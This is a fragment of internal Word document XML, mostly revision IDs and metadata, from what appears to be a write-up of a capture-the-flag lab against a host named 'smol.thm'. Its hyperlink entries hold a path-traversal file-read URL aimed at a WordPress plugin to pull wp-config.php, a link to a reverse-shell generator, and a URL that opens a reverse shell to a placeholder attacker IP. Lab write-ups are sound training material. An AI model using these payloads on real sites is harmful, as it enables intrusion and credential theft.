    <w:rsid w:val="00C71E1E"/>
    <w:rsid w:val="00C7204F"/>
    <w:rsid w:val="00C765AA"/>
    <w:rsid w:val="00C81626"/>
    <w:rsid w:val="00C84634"/>
    <w:rsid w:val="00C860D6"/>
    <w:rsid w:val="00C87F1E"/>
    <w:rsid w:val="00C9576B"/>
    <w:rsid w:val="00CB030D"/>
    <w:rsid w:val="00CB14C4"/>
    <w:rsid w:val="00CB1AF3"/>
    <w:rsid w:val="00CB2503"/>
    <w:rsid w:val="00CB4A95"/>
    <w:rsid w:val="00CC4369"/>
    <w:rsid w:val="00CD0081"/>
    <w:rsid w:val="00CE45DB"/>
    <w:rsid w:val="00CF1E96"/>
    <w:rsid w:val="00CF506C"/>
    <w:rsid w:val="00CF5713"/>
    <w:rsid w:val="00D00397"/>
    <w:rsid w:val="00D00A8C"/>
    <w:rsid w:val="00D01937"/>
    <w:rsid w:val="00D100D5"/>
    <w:rsid w:val="00D150B1"/>
    <w:rsid w:val="00D202C6"/>
    <w:rsid w:val="00D42716"/>
    <w:rsid w:val="00D50D05"/>
    <w:rsid w:val="00D55742"/>
    <w:rsid w:val="00D60B3C"/>
    <w:rsid w:val="00D62644"/>
    <w:rsid w:val="00D74266"/>
    <w:rsid w:val="00D82082"/>
    <w:rsid w:val="00D902AF"/>
    <w:rsid w:val="00D92006"/>
    <w:rsid w:val="00D92A74"/>
    <w:rsid w:val="00DA3BBC"/>
    <w:rsid w:val="00DB0E2E"/>
    <w:rsid w:val="00DB2B45"/>
    <w:rsid w:val="00DC1657"/>
    <w:rsid w:val="00DC5E15"/>
    <w:rsid w:val="00DC7D8A"/>
    <w:rsid w:val="00DD1617"/>
    <w:rsid w:val="00DD3498"/>
    <w:rsid w:val="00DD5950"/>
    <w:rsid w:val="00DE1843"/>
    <w:rsid w:val="00DE6586"/>
    <w:rsid w:val="00DF5716"/>
    <w:rsid w:val="00E103AA"/>
    <w:rsid w:val="00E14085"/>
    <w:rsid w:val="00E1461F"/>
    <w:rsid w:val="00E150A7"/>
    <w:rsid w:val="00E165EB"/>
    <w:rsid w:val="00E17A81"/>
    <w:rsid w:val="00E2193F"/>
    <w:rsid w:val="00E24DDE"/>
    <w:rsid w:val="00E35102"/>
    <w:rsid w:val="00E41C91"/>
    <w:rsid w:val="00E46C21"/>
    <w:rsid w:val="00E47E4C"/>
    <w:rsid w:val="00E50344"/>
    <w:rsid w:val="00E52B0F"/>
    <w:rsid w:val="00E55F39"/>
    <w:rsid w:val="00E5695A"/>
    <w:rsid w:val="00E66F0C"/>
    <w:rsid w:val="00E7365D"/>
    <w:rsid w:val="00E746DE"/>
    <w:rsid w:val="00E74F23"/>
    <w:rsid w:val="00E83408"/>
    <w:rsid w:val="00E835F1"/>
    <w:rsid w:val="00E92BDC"/>
    <w:rsid w:val="00E92D66"/>
    <w:rsid w:val="00E95672"/>
    <w:rsid w:val="00EA111F"/>
    <w:rsid w:val="00EB2624"/>
    <w:rsid w:val="00EB3B17"/>
    <w:rsid w:val="00ED38CE"/>
    <w:rsid w:val="00ED4170"/>
    <w:rsid w:val="00ED6F4E"/>
    <w:rsid w:val="00ED7FAE"/>
    <w:rsid w:val="00EE7864"/>
    <w:rsid w:val="00EF15EC"/>
    <w:rsid w:val="00EF61F9"/>
    <w:rsid w:val="00EF77FF"/>
    <w:rsid w:val="00F02FB1"/>
    <w:rsid w:val="00F031C6"/>
    <w:rsid w:val="00F03624"/>
    <w:rsid w:val="00F06392"/>
    <w:rsid w:val="00F065F4"/>
    <w:rsid w:val="00F10CCD"/>
    <w:rsid w:val="00F13D5B"/>
    <w:rsid w:val="00F20998"/>
    <w:rsid w:val="00F25D63"/>
    <w:rsid w:val="00F27161"/>
    <w:rsid w:val="00F27A62"/>
    <w:rsid w:val="00F37E1E"/>
    <w:rsid w:val="00F43390"/>
    <w:rsid w:val="00F46A90"/>
    <w:rsid w:val="00F52DC3"/>
    <w:rsid w:val="00F625CE"/>
    <w:rsid w:val="00F661BE"/>
    <w:rsid w:val="00F72909"/>
    <w:rsid w:val="00F72EDD"/>
    <w:rsid w:val="00F7620E"/>
    <w:rsid w:val="00F80EF7"/>
    <w:rsid w:val="00F95B24"/>
    <w:rsid w:val="00F97754"/>
    <w:rsid w:val="00FA0526"/>
    <w:rsid w:val="00FA71D0"/>
    <w:rsid w:val="00FB1048"/>
    <w:rsid w:val="00FB64B0"/>
    <w:rsid w:val="00FE159E"/>
    <w:rsid w:val="00FE7E72"/>
    <w:rsid w:val="00FF0613"/>
    <w:rsid w:val="00FF421A"/>
    <w:rsid w:val="00FF5B1B"/>
    <w:rsid w:val="00FF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AFE4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D5FE640D-ADB7-4BE3-966F-F1F9C6F5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50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50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50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506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5068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506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5068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506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506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50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5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506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6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6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506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6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74DB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74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hyperlink" Target="https://www.revshells.com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://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&amp;call=getRawDataFromDatabase&amp;query=php://filter/resource=../../../../wp-content/plugins/hello.php" TargetMode="External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www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&amp;call=getRawDataFromDatabase&amp;query=php://filter/resource=../../../../wp-config.php" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.smol.thm/wp-admin/profile.php?cmd=sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F_my_own_machine_ip_%2F4444%200%3E%261" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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13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3715</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-08T20:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-13T14:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>